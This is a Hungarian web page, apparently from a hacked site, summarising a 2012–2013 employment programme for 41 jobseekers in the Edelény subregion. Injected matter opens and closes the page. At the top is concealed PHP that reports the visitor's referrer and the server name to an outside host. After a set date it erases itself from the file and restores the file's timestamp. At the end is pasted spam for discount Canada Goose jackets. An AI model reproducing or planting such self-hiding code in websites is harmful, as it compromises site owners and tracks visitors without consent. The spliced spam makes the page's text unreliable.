check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731891){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } „Kistérséget építünk” – Foglalkoztatási program keretében nyújtott segítségnyújtás az Edelényi Kistérségben
 
 
2016 | 10 | 28
Főmenü
Kedvezményezett:
Közreműködő szervezet:
Partnerek:

„Kistérséget építünk” – Foglalkoztatási program keretében nyújtott segítségnyújtás az Edelényi Kistérségben

 

A program rövid összefoglalója

(részletek a megvalósíthatósági tanulmányból)

 

A „Kistérséget építünk” foglalkoztatási projekten belül 41 fő, az Edelényi kistérségben élő - lehetőleg diplomával rendelkező - tartós munkanélküli, 50 éven felüli, gondozásból visszatérő vagy pályakezdő, személy foglalkoztatására kerül sor, 13 hónap időtartamban. A projekt célja a célcsoport segítésén túl, hogy ugyanezen időszak alatt az Edelényi kistérség, a foglalkoztatottak révén jelentős szellemi kapacitáshoz jusson. Hosszú távú célként jelenik meg, hogy a foglalkoztatás során szakmai tapasztalatot és referenciát szerzett kvalifikált munkaerő térségen belüli elhelyezkedése vagy önfoglalkoztatóvá válása. Az egzisztenciát sikeresen kiépítő, képzett személyek kistérségen belüli megtartása közvetve és közvetlenül is hozzájárul a kistérség területi hátrányainak csökkenéséhez.

A projekt időtartama 2012. szeptember 1-től 2013. szeptember 30-ig tart. A projektbe bevont személyek foglalkoztatására ebben az időszakban kerül sor. A foglalkoztató az Edelényi Kistérség Többcélú Társulása lesz. A foglalkoztatás több helyszínen zajlik. A projektben résztvevők a szakmai végzettségük és egyéni motivációik szerint munkacsoportokat alkotnak. A jelentkezők végzettségének és képzettségének összetételétől függően 5 team alakul. A teamek munkája a kistérség stratégiai és operatív fejlesztési feladatainak segítése. A csoportok munkája a kistérségi fejlesztési irányokhoz igazodik: gazdaságfejlesztés, energetika, agrárium és környezetvédelem, kommunikáció, oktatásfejlesztés területen.

Minden csoportban 2-4 fő alkotja a teamek szakmai magját jelentő, folyamatosan jelen lévő tagokat. A foglalkoztatásuk helyszíne az Edelényi Kistérség Többcélú Társulásánál lesz, a projekt időtartamára kialakított projektirodában. A teamek többi tagja a kistérség területén, különböző szervezetekhez és intézményekhez kerül kihelyezésre, ahol olyan, az adott munkahely profiljához kapcsolódó munkát végeznek, amely pozitívan járul hozzá a kistérség komplex fejlesztéséhez, és emellett végzik a team feladatokat.

A szakmai teamek egy-egy szakértőt kapnak tutorként, akinek feladata a team tagok szakmai segítése, motiválása, szakmai munícióval történő ellátása. A teamek feladata az adott terület fejlesztési stratégiájának és a stratégiák operatív programjainak elkészítése. Ennek érdekében a szakmai teamek havonta egy hetes időtartamú műhelymunkát tartanak, amelyen a team minden tagja részt vesz. Ebben az egy hetes időintervallumban a kihelyezett foglalkoztatottak is a központi projektirodában végeznek szakmai tevékenységet. Ugyanakkor az összes, projektbe bevont foglalkoztatott részvételével havi egy alkalommal konferencia kerül megrendezésre, ahol a tagok beszámolnak egy havi tevékenységükről, ez által kölcsönösen megosztva egymással tapasztalataikat, hozzájárulva a foglalkoztatottak szakmai fejlődéséhez.

Figyelembe véve, hogy a projektben részt vevő foglalkoztatottak pályakezdők vagy tartós munkanélküliek, a projekt keretében a foglalkoztatást és a későbbi elhelyezkedést megkönnyítő képzésben részesülnek. A képzés általános kistérség fejlesztési ismeretek, helyi vezetőképzés, vállalkozó ismeretek, pályaorientációs és pályakorrekciós tanácsadás lesznek.

(…)

A költségek legnagyobb részét a bevont foglalkoztatottak bére és a bérek járulékai jelentik. A projektbe bekerült személyek bére a végzettségüknek megfelelően, differenciált módon kerül megállapításra. A differenciálás, a közalkalmazotti bértábla elveihez igazodóan a rendelkezésre álló forrás meghatározottságában kerül kialakításra. A projektben adható bér diplomás munkavállalók esetén átlag bruttó 156 000 Ft és az ehhez kapcsolódó járulékok. Egyéb személyi jellegű kifizetések tekintetében munkába járási költségtérítés jár a munkavállalóknak. A munka hatékonyságának növelése érdekében informatikai eszközök kerülnek biztosításra (notebook, szükséges software, pendrive, mobil net, nyomtató). A projektbe bevont foglalkoztatottak egy része, 28 db, az irodai feladatok ellátására konfigurált notebookot kap a foglalkoztatás teljes időtartamára. Továbbá minden egyes foglalkoztatott és menedzsment tag a gördülékeny munkavégzés érdekében el lesz látva egy pendrive-val.

A projekt iroda és a szakmai teamek irodai munkáját fogja segíteni 3 darab, nyomtató és az irodák berendezését képező bútorok.

A nyomtatókhoz szükséges papír és festéktoner mennyiség is a projekt költségeinek részét képezi. A műhely összejövteleknek is helyet biztosító projekt irodát az Edelényi Kistérség Többcélú Társulása veszi bérbe 13 hónap időtartamra, szintén a projekt költségeinek terhére. A menedzsment hatékony működését szolgálják a felmerülő telefon és internetköltségek. A projekt megvalósítás minden területén megjelenik útiköltség a megvalósítás 13 hónapos időtartamára. Ebből a keretből kerül finanszírozásra a projektmenedzsment és a foglalkoztatottak projektmegvalósítással kapcsolatos utazási költsége.

(…)

A projekt szakmai megvalósításában részt vesz partnerként az Észak-magyarországi Regionális Munkaügyi Központ. Feladata a toborzáshoz és a kiválasztáshoz szükséges információk biztosítása.

A kiválasztás személyes elbeszélgetés alapján történik, elsődleges szempontjai a célcsoportnak való megfelelés, a szakmai végzettség, a hátrányos helyzet megléte és a személyes motiváció értékelése.

További együttműködő partnerként jelennek meg a kihelyezett foglalkoztatásnak helyet adó önkormányzatok, intézmények, szervezetek, melyeknek kiválasztása a foglalkoztatottak végzettségi profiljának és lakhelyének függvényében történik.

A megvalósítás további partnere a képzést biztosító cég, melynek kiválasztása közbeszerzési eljárás keretében történik.

(…)

A projekt céljainak meghatározása

 

A projekt célrendszere összetett. Rövidtávon két cél artikulálódik:

 1. 41 fő, az Edelényi kistérség területén élő - lehetőleg diplomával rendelkező - tartós munkanélküli, 50 éven felüli, gondozásból visszatérő vagy pályakezdő személy 13 hónapon keresztül történő foglalkoztatása. A foglalkoztatás ideje alatt a pályakezdők vagy a munka világából kikerült foglalkoztatottak szakmai tapasztalatot, referenciát szereznek. Megismerik a kistérségi szinten zajló társadalmi és gazdasági folyamatokat és a problémakezelés színtereit. Szakmai felvértezettségük és személyes motivációik alapján be tudnak kapcsolódni a problémák kezelésbe, felszámolásába.
 2. Az Edelényi kistérség fejlesztési kapacitásainakés az Edelényi kistérség területén működő szervezeti és intézményhálózatnak a megerősítése. A projektben részt vevők által kidolgozott, a fejlesztési irányokhoz kapcsolódó, tematikusan stratégiák és operatív programok olyan szellemi tőkét jelentenek a kistérség számára, amire alapozva következetes és szinergikus, hatékony fejlesztési és forrásszerzési tevékenységet lehet végezni. Az Edelényi Kistérség Többcélú Társulása, mint projektgazda, garanciát biztosít arra, hogy a kidolgozott dokumentumokat a kistérség minden szereplője legitim tervként fogadja el.

A foglalkoztatottak kihelyezésével megerősödött intézmények és szervezetek a kapacitásbővülést hatékonyan tudják felhasználni a kistérség területi hátrányából eredő problémák kezelésére.

 

Középtávú célkéntjelenik meg, hogy a foglalkoztatottak lehetőség szerint a 13 hónap foglalkoztatási időszak letelte után elhelyezkedjenek az elsődleges munkaerőpiacon, vagy önfoglalkoztatottá válnak, lehetőség szerint az Edelényi kistérség területén. A kihelyezett munkavállalóknak lehetőségük van 13 hónap alatt bedolgozni magukat a foglalkoztatást biztosító intézményekhez, ahol adott esetben lehetőséget biztosítanak a továbbfoglalkoztatásra, ez által a kistérségben történő megtartásra, letelepedésre.

 

Hosszú távú cél az Edelényi kistérségben élő kvalifikált munkaerő megtartása, a képzettségi szint növelése, a lokális társadalmak egészséges szerkezetének javítása, illetve a kistérség követő fejlődési pályáról eltérő, alternatív, hatékony fejlődési pályára állítása, a leghátrányosabb helyzet megszüntetése.

(…)

a fejlesztések hatásterülete

A projekt hatásterülete komplex. A fejlesztési tevékenység az Edelényi kistérség mind a 47 települését és az azokon élő teljes népességet érinti. A foglalkoztatottak alkalmazásával jelentősen nő a kistérség fejlesztési kapacitása, amely a fejlesztési szakterültek minden szereplőjét érinti. A következetes és megalapozott fejlesztési tervek megvalósítása hozzájárul a kistérség abszorpciós képességének növeléséhez.

A foglalkoztatásba bevont intézmények és szervezetek időszakos kapacitásbővüléshez jutnak, amely az érintett településeken és ágazatokban lehetővé teszi a lemaradást okozó problémák hatékony kezelését.

A pályázat benyújtásig elvégzett felmérés és tájékozódás eredményeként megállapítást nyert a kistérségben élő diplomás munkanélküliek végzettség szerinti összetétele. Ez természetesen a projekt elindulásáig változhat, de a projekt kidolgozásához iránymutatóként szolgált. Beavatkozási területként jelenik meg az oktatás, turizmus, gazdaságfejlesztés, kommunikáció, energetika, agrárium és környezetvédelem.

(…)

A célok eléréséhez szükséges tevékenységek bemutatása

 • (…)szakmai teamek kialakítása

A projekt foglalkoztatási részébe beválasztott személyek végzettsége és személyes motivációi alapján 5 szakmai team kerül kialakításra, melyek állandó tagjai a fejlesztési feladatokat látják el, a kapcsolódó tagok szakmai tapasztalatszerzés és az ellátórendszer megerősítése céljábólkihelyezésre kerülnek a kistérség önkormányzataihoz, intézményeihez, szervezeteihez.

 

 • képzés lebonyolítása

Képző cég kiválasztása, a projektbe beválasztott személyek képzésben részesítése. A képzés tematikája az alábbi tárgyakból tevődik össze:

 • általános kistérség fejlesztési ismeretek
 • helyi vezetőképzés
 • vállalkozó ismeretek
 • pályaorientációs és pályakorrekciós tanácsadás

 

 • foglalkoztatás beindítása

A célcsoport projektbe felvételt nyert tagjai az Edelényi Kistérség Többcélú Társulásával kötnek munkaszerződést 13 hónap időtartamra. A képzésen való részvétel után a szakmai teamek állandó tagjai (10 fő) a projekt irodában állnak munkába. Ők képezik a szakmai teamek magját. Fő tevékenységeik a szakirányú fejlesztési feladatok kidolgozása, lehetőség szerint operatív megvalósítása.

A szakmai teamek nem állandó tagjai kihelyezésre kerülnek az Edelényi kistérség különböző önkormányzataihoz, intézményeihez, szervezeteihez. A kihelyezés helye függ a foglalkoztatott végzettségétől, személyes motivációitól, illetve a fogadó hely igényeitől. Minden esetben szem előtt tartandó cél, hogy a foglalkoztatott kihelyezésével az általa elvégzett munka hozzájáruljon az Edelényi kistérség fejlődéséhez, a területi hátrány tényezőinek csökkentéséhez.

 

 • szakmai műhelymunkák lebonyolítása

Minden szakmai team egy hónapban egy heti időtartamara műhelymunkára ül össze. Ezen részt vesznek a team állandó és kihelyezett tagjai is. A workshop lényege, a fejlesztésekhez szükséges tapasztalatok, észrevételek összegyűjtése, továbbgondolása. A cél a projektben felgyülemlett tudás kumulálása továbbá, hogy minden egyes foglalkoztatott érezze át a fejlesztési folyamatokban betöltött szerepét, érezze magáénak a kapott és viselt feladatot. A workshopokon kerül sor az előző havi feladatok minősítésére és a következő hónapra ütemezett feladatok egyeztetésére.

 

 • belső konferenciák megszervezése

A konferencia szerepe hasonlít a workshopok szerepéhez, de ez az összes foglalkoztatott részvételével zajlik, havi egy alkalommal. Célja a tapasztalatok és ismeretek összegyűjtése, együttes továbbgondolása, a havi ütemtervek és teendők megbeszélése.

(…)

A tevékenységek szakmai tartalmának meghatározása

képzés:

A projekt szakmai sikere a fejlesztési feladatok és a foglalkoztatatás optimális összehangolásában rejlik. Ennek érdekében a célcsoporton belül kiválasztott kvalifikált szakemberek mindegyike képzésben részesül általános kistérség fejlesztési ismeretek, helyi vezetés, vállalkozói ismeretek, pályaorientációs és pályakorrekciós tanácsadás témában. A képzés időtartama 200 óra.

(…)

fejlesztési teamek létrehozása:

A foglalkoztatottakból szakmai teamek alakulnak. A foglalkoztatottak végzettsége alapján 5 team kialakítására kerül sor, melynek tematikái illeszkednek az Edelényi kistérség fejlesztési irányaihoz. A lehetségesen megalakuló teamek a gazdaságfejlesztés, energetika, agrárium és környezetvédelem, kommunikáció, oktatásfejlesztés területen fejtik ki szakmai tevékenységüket. A teamekben 10 fő állandó tag kerül foglalkoztatásra, akik kizárólag a fejlesztési feladatokkal foglalkoznak. A más intézményhez, szervezethez kihelyezésre került munkavállalók is bekapcsolódnak a teamek munkájába, önálló feladatok elvégzésével illetve a műhely összejöveteleken és konferenciákon való aktív részvétellel. A teamek szakmai tanácsokkal való ellátására és a megfelelő szellemi mederbe való tartására 4 fő tutor kerül bevonásra.

(…)

foglalkoztatás:

A projekt keretében foglalkoztatott személyek munkáltatója az Edelényi Kistérség Többcélú Társulása lesz. A 2012 szeptember 1-el kezdődő munkaviszony 2012. szeptember 30-ig tart. A szakmai teamek állandó tagjait jelentő 10 fő kivételével a többi 31 személy kihelyezésre kerül a programhoz kapcsolódó partnerekhez. A partnerek a kistérség önkormányzatai, intézményei és egyéb szervezetei közül kerülnek ki. A kihelyezett foglalkoztatott munkáltatója továbbra is az Edelényi Kistérség Többcélú Társulása lesz. A foglalkoztatás helyszínét biztosító partner a szakmai vezetővel egyeztetve határozza meg a kihelyezett foglalkoztatott munkakörét, feladatait. Ez által garancia vállalható azért, hogy a projekt keretében foglalkoztatott személy alkalmazásával tényleges kapacitásbővülés jelentkezzen az intézményeknél, szervezeteknél és a foglalkoztatott személy mindennapi munkája egyaránt hozzájáruljon a projekt hosszú távú céljához, a kistérség tényleges fejlődéséhez, és a foglalkoztatott munkaerő-piaci értékeinek növekedéséhez. A kihelyezett személy munkarendje úgy kerül kialakításra, hogy lehetősége nyíljon a havonta egy hetes időtartammal megrendezendő team műhely összejövetelen, illetve a havi egy konferencián való megjelenésre.

Amennyiben a szakmai vezető úgy ítéli meg, hogy a kihelyezett foglalkoztatás valamely szempontból nem éri el a célját, a foglalkoztatottat átcsoportosíthatja másik telephelyre, ahol ténylegesen megvalósulnak a projekt által elérni kívánt célok.

Mivel a partnerek kiválasztását a projektbe bekerülő személyek végzettségi profilja határozza meg, a projekt tervezési fázisában nem történt meg a konkrét partnerek meghatározása. A kihelyezett munkavégzés az oktatás, gazdaságfejlesztés, energetika, környezetvédelem, szociális ellátás, közművelődés településüzemeltetés, közigazgatás területein valósulhat meg. A központi munkahely az edelényi projektiroda lesz, ahol a meghatározott ágazatok fejlesztési stratégiájának kidolgozása történik.

A projektbe bekerült személyek bére a végzettségüknek megfelelően, differenciált módon kerül megállapításra. A differenciálás a közalkalmazotti bértáblához igazodó, de azzal nem teljes mértékben megfeleltethető. A projektben adható bér diplomás munkavállalók esetén átlag bruttó 156 000 Ft és az ehhez kapcsolódó járulékok. Egyéb személyi jellegű kifizetések tekintetében munkába járási költségtérítés jár a munkavállalóknak.

(…)

A projekt hatásainak elemzése

A projekt közvetlen hatása az Edelényi kistérség foglalkoztatási helyzetének javítása. 13 hónap időtartamra 41 fő pályakezdőnek, tartós munkanélkülinek, ötven éven felüli munkavállalónak vagy gondozásból a munkaerő-piaci visszatérni szándékozó személynek biztosít tartalmas munkavégzést és megfelelő jövedelmet.

A képzéssel és a folyamatos szakmai inspirációval a tudásszint növelése érhető el. Az átadott ismeretek birtokában a foglalkoztatottak sikerrel végezhetik el a rájuk rótt feladatokat, illetve segítséget kapnak a munkaerő-piacra történő (vissza)integrálódáshoz. A rendszeres munkavégzés pozitív mentálhigiénés hatása is jelentős. Mindazonáltal a projektbe bevont személyek szakmai tapasztalatot és referenciát szereznek.

Párhuzamosan megerősödik az Edelényi kistérség fejlesztési kapacitása, a jövőbeni hatékony fejlesztési tevékenység alapjai teremtődnek meg mind a stratégiai tervezés, mint a forrásszerzést megalapozó tevékenység területén. Felhalmozott szellemi tőke lehetőséget biztosít eddig még meg nem határozott fejlesztési módszerek-, forgatókönyvek kidolgozásához, a kistérség eddig követő fejlődési pályájának átalakításához, egy új, alternatív fejlődési pályára állításához. A partnerekhez kihelyezett munkavállalók a kistérség több településén, több ágazatban tudnak hozzájárulni a napi szintű feladatok eredményes elvégzéséhez, a kistérség állapotának javításához, az együttműködés fokozásához.

Közvetett hatása a foglalkoztatottakkal egy háztartásban élők életszínvonalának emelkedése. A szűkebb társadalmi környezet pozitív mintához jut és a mérséklődik a kvalifikált munkaerő térségből történő elvándorlása.

Fontos eredmény a foglalkoztatottaknak a kistérséghez, településükhöz való kötődésének erősödése, a létrejövő emocionális muníció a térség megtartó erejének növekedésében.

A több szinten megjelenő pozitív tényező együttesen járul hozzá az Edelényi kistérség fejletségi szintjének növeléséhez és a leghátrányosabb helyzetből való kijutáshoz.

(Kivonat a megvalósíthatósági tanulmányból)

 
Vissza
Firefox 1024*768-ra optimalizálva.
buy Mens Canada Goose HYBRIDGE LITE VEST Discount Womens Canada Goose CHILLIWACK BOMBER Arctic Dusk Order Womens Canada Goose VICTORIA Parka Discount Womens Canada Goose EXPEDITION Parka Womens Canada Goose KENSINGTON Parka Discount Womens Canada Goose CAMP COAT Black Sale Online Discount Womens Canada Goose CAMP COAT Black Sale Online Womens Canada Goose SOLARIS Parka Discount Womens Canada Goose SHELBURNE Parka Womens Canada Goose VICTORIA Parka Authentic Womens Canada Goose FREESTYLE VEST Discount Authentic Womens Canada Goose TRENTON JACKET Discount Order Womens Canada Goose VICTORIA Parka Buy Mens Canada Goose HYBRIDGE LITE HOODY Discount Authentic Womens Canada Goose MORAINE SHELL JACKET Womens Canada Goose VICTORIA Parka Mens Canada Goose TIMBER SHELL JACKET Discount Mens Canada Goose CHILLIWACK BOMBER Parka Discount Mens Canada Goose COASTAL SHELL Pacific Blue Mid Grey top sale 2015 and 2016 Discount Mens Canada Goose COASTAL SHELL Slate Red top sale 2015 and 2016 Buy Womens Canada Goose HYBRIDGE LITE HOODY Discount Womens Canada Goose FREESTYLE VEST Buy Mens Canada Goose HYBRIDGE LITE VEST Mens Canada Goose MORAINE SHELL JACKET